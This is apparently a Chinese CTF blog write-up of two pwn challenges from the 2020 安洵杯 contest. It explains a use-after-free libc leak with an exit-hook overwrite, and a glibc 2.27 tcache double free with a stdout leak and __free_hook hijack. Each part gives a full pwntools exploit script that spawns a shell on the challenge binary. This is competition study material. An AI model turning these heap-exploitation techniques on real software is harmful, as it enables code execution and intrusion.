2020安洵杯

字数统计: 1.7k字   |   阅读时长≈ 8分

Pwn 题加了一些C++奇奇怪怪的东西,看到C++就有点反感。后续要花点时间学习一下C++ Pwn。

最近,在总结自己最近几场比赛的状态:1. 常规题自己虽然能做,但是太慢了,拿不到blood,还有比赛有时候会遇到一些突发状况。以后这种题就要做的又快又稳;2. 新题,这类题其实原理不复杂,但是可能夹杂了许多干扰,就导致自己把自己吓住了,这以后一定要能够细致的分析题目加坚持;3.难题,这类题可能就是比较难的方向,但是一定要坚持分析看下去,先把题目的思路理清楚,然后再分析能不能做。

最后,以王安石《游褒禅山记》中的一句话,算是给以后一个方向吧:

世之奇伟、瑰怪,非常之观,常在于险远,而人之所罕至焉,故非有志者不能至也。

Einstein

程序分析

漏洞点很简单,主要是check的时候,如果name check不过,会free(chun1),而 Passwd不过时,会输出 chunk1的内容,此时就可以泄露 libc地址。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
__int64 __fastcall check(__int64 a1)
{
  __int64 result; // rax
  char *chunk1; // [rsp+18h] [rbp-18h]
  char *chunk2; // [rsp+20h] [rbp-10h]
  _QWORD *v4; // [rsp+28h] [rbp-8h]
  _QWORD *v5; // [rsp+28h] [rbp-8h]

  chunk1 = (char *)malloc(0x80uLL);
  if ( chunk1 )
  {
    chunk2 = (char *)malloc(0x80uLL);
    if ( chunk2 )
    {
      v4 = cJSON_GetObjectItem(a1, (__int64)"name");
      snprintf(chunk1, 0x80uLL, "%s", v4[4]);
      if ( strcmp(chunk1, "admin") )
      {
        printf("logger:%s login error!\n", chunk1);
        free(chunk1);
      }
      v5 = cJSON_GetObjectItem(a1, (__int64)"passwd");
      snprintf(chunk2, 0x80uLL, "%s", v5[4]);
      if ( strcmp(chunk2, "admin") )
      {
        printf("logger:%s login error!\n", chunk1);// leak libc_addr
        free(chunk2);
      }
      result = 1LL;
    }
    else
    {
      puts("logger:passwd malloc error!");
      result = 0LL;
    }
  }
  else
  {
    puts("logger:name malloc error!");
    result = 0LL;
  }
  return result;
}

然后就可以修改3字节,来 getshell

利用分析

这里泄露出 Libc地址后,只能修改3字节来 getshell

其实,很久之前应该是做过修改 exit_hookgetshell的题,但是太久远已经忘记这种方法。(:这也说明我做题后面复习的时候,没有仔细调试,所以就没有太多记忆:)在这里分析一下:

首先分析一下 exit.c源代码,exit源代码会调用 __run_exit_handlers函数

1
2
3
4
5
void exit (int status)
{
  __run_exit_handlers (status, &__exit_funcs, true);
}
libc_hidden_def (exit)

然后 __run_exit_handlers的主要逻辑就是去调用注册的exit的处理函数,我们主要关注这里面的exit_function_list结构体,程序会接着执行三个call指令。我们通过动态调试看看这三个call会调用什么函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
//经删减
void attribute_hidden
__run_exit_handlers (int status, struct exit_function_list **listp,
		     bool run_list_atexit)
{
  /* First, call the TLS destructors.  */
#ifndef SHARED
  if (&__call_tls_dtors != NULL)
#endif
    __call_tls_dtors ();

  /* We do it this way to handle recursive calls to exit () made by
     the functions registered with `atexit' and `on_exit'. We call
     everyone on the list and use the status value in the last
     exit (). */
  while (*listp != NULL)
    {
      struct exit_function_list *cur = *listp;

      while (cur->idx > 0)
	{
	  const struct exit_function *const f =
	    &cur->fns[--cur->idx];
	  switch (f->flavor)
	    {
          //关键call指令
	      void (*atfct) (void);
	      void (*onfct) (int status, void *arg);
	      void (*cxafct) (void *arg, int status);

		  ...
	    }
	}

      *listp = cur->next;
      if (*listp != NULL)
	/* Don't free the last element in the chain, this is the statically
	   allocate element.  */
	free (cur);
    }

  if (run_list_atexit)
    RUN_HOOK (__libc_atexit, ());

  _exit (status);
}

接下来我们动态调试一下这三个call指令的调用关系:

image-20201126154156953

我们从 _dl_fini源码中可以发现,其中调用了两个函数 __rtld_lock_lock_recursive_rtld_lock_unlock_recursive两个函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
void internal_function
_dl_fini (void)
{
#ifdef SHARED
  int do_audit = 0;
 again:
#endif
  for (Lmid_t ns = GL(dl_nns) - 1; ns >= 0; --ns)
    {
      /* Protect against concurrent loads and unloads.  */
      __rtld_lock_lock_recursive (GL(dl_load_lock));

      unsigned int nloaded = GL(dl_ns)[ns]._ns_nloaded;
      /* No need to do anything for empty namespaces or those used for
	 auditing DSOs.  */
      if (nloaded == 0
#ifdef SHARED
	  || GL(dl_ns)[ns]._ns_loaded->l_auditing != do_audit
#endif
	  )
	__rtld_lock_unlock_recursive (GL(dl_load_lock));
      else
	{
	  /* Now we can allocate an array to hold all the pointers and*/
		...
	   
	}
    

#ifdef SHARED
  if (! do_audit && GLRO(dl_naudit) > 0)
    {
      do_audit = 1;
      goto again;
    }

  if (__glibc_unlikely (GLRO(dl_debug_mask) & DL_DEBUG_STATISTICS))
    _dl_debug_printf ("\nruntime linker statistics:\n"
		      "           final number of relocations: %lu\n"
		      "final number of relocations from cache: %lu\n",
		      GL(dl_num_relocations),
		      GL(dl_num_cache_relocations));
#endif
}

而这两个结构体存放在 _rtld_global结构体中,这个结构体我们是可以直接在gdb中找到地址:

image-20201126155037291

因此,我们可以找到两个固定的libc地址,只需要劫持这两个函数指针,我们就可以成功劫持 exit函数。

总结:

exit()中执行流程为
exit()->__run_exit_handlers->_dl_fini->__rtld_lock_unlock_recursive
由于__rtld_lock_unlock_recursive存放在结构体空间,为可读可写,那么如果可以修改__rtld_lock_unlock_recursive,就可以在调用exit()时劫持程序流。
_rtld_lock_lock_recursive也是一样的流程。

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])

debug = 1
if debug == 1:
    p =process('./sfs')
    elf = ELF('./sfs')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    p = remote('axb.d0g3.cn', 20102)
    elf = ELF('./IO_FILE')
    libc = ELF('./libc.so.6')
gadgets = [0x45226, 0x4527a, 0xf0364, 0xf1207]


def Pwn():
    info = '''{"name":"123456789123", "passwd":"21321"}'''
    p.recvuntil('your name and passwd.\n')
    p.sendline(info)
    p.recvuntil('login error!\n')
    p.recvuntil('logger:')
    #gdb.attach(p, 'bp $rebase(0xff1)')
    libc_addr = u64(p.recv(6).ljust(8, '\x00'))
    libc.address = libc_addr - 88 - 0x10 - libc.sym['__malloc_hook']
    print("libc_addr:",hex(libc_addr))
    print("libc.address:",hex(libc.address))
    exit_addr = libc.sym['exit']
    print("exit:",hex(exit_addr))
    gadget = gadgets[2] + libc.address
    print("Gadget:",hex(gadget))
    exit_hook = libc.address + 9412424
    print('exit_hook:',hex(exit_hook))

    #gdb.attach(p, 'bp $rebase(0xff1)')
    p.send(p64(exit_hook))
    addr1 = gadget & 0xff
    print("addr1:",hex(addr1))
    p.send(p8(addr1))

    p.send(p64(exit_hook+1))
    addr2 = (gadget & 0xff00) >> 8
    print("addr2:",hex(addr2))
    p.send(p8(addr2))

    p.send(p64(exit_hook+2))
    addr3 = (gadget & 0xff0000) >> 16
    print("addr2:",hex(addr3))
    p.send(p8(addr3))

    p.interactive()

Pwn()

IO_FILE

程序分析

2.27 glibc下的tcache double free攻击。是简单题。

利用分析

唯一需要 注意的就是,这里由于程序没有开PIE,可以直接先修改 chunk_list,将一些无用块指针清空。这样才能保证后面 getshell时的 chunk数量不会超出。

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])

debug = 1
if debug == 1:
    p =process('./IO_FILE')
    elf = ELF('./IO_FILE')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    p = remote('axb.d0g3.cn', 20102)
    elf = ELF('./IO_FILE')
    libc = ELF('./libc.so.6')

def Add(size, content):
    p.sendlineafter('>', str(1))
    p.sendlineafter('size:', str(size))
    p.sendafter('description:', content)

def Delete(idx):
    p.sendlineafter('>', str(2))
    p.sendlineafter("index:", str(idx))

heap_list = 0x6020d0
while True:
    try:
        Add(0x28, '0')
        Add(0x80, '1')
        Add(0x38, '2')

        for i in range(7):
            Delete(1)

        Delete(1)
        Add(0x38, '\x60\xd7')   #3

        Delete(2)
        Delete(2)
        Add(0x38, p64(heap_list))   #3
        Add(0X38, 'A')  #4
        #gdb.attach(p, 'bp 0x400a9b')
        Add(0x38, p64(0)*5) #6

        Delete(0)
        Delete(0)
        Add(0x28, '\xf0')   #2

        Add(0x28, '5')
        Add(0x28, '/bin/sh\x00')
        #stdout
        payload = p64(0xfbad2887 | 0x1000) + p64(0) * 3 + b"\x00"
        Add(0x28, payload)
        p.recvuntil(p64(0xfbad2887 | 0x1000), timeout=1)
        d = p.recv(0x18)
        libc_addr = u64(p.recv(8)) + 0x60 - libc.sym['_IO_2_1_stdout_']
        print('libc:',hex(libc_addr))
        libc.address = libc_addr #= u64(p.recvuntil('\x7f', timeout=1)[-6:].ljust(8, '\x00'))
        print ('libc_addr:',hex(libc.address))

        if '\x7f' not in p64(libc.address):
            raise EOFError

        break
    except:
        p.close()
        #p = remote('axb.d0g3.cn', 20102)
        p = process('./IO_FILE')

print('libc_base:',hex(libc.address))
free_hook = libc.sym['__free_hook']
system_addr = libc.sym['system']
print("system_addr:",hex(system_addr))

Add(0x48, 'a')
Delete(6)
Delete(6)

payload = p64(free_hook)    #
Add(0x48, payload)
#gdb.attach(p, 'bp 0x400a9b')
Add(0x48, p64(system_addr))
Add(0x48, p64(system_addr))
#gdb.attach(p, 'bp 0x400a9b')
Delete(4)

p.sendline("cat flag")
p.interactive()

只要你支持她,我们就是好朋友2333

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

主要研究:
二进制安全、漏洞挖掘
CTF菜鸡一只

天枢Dubhe 学习ing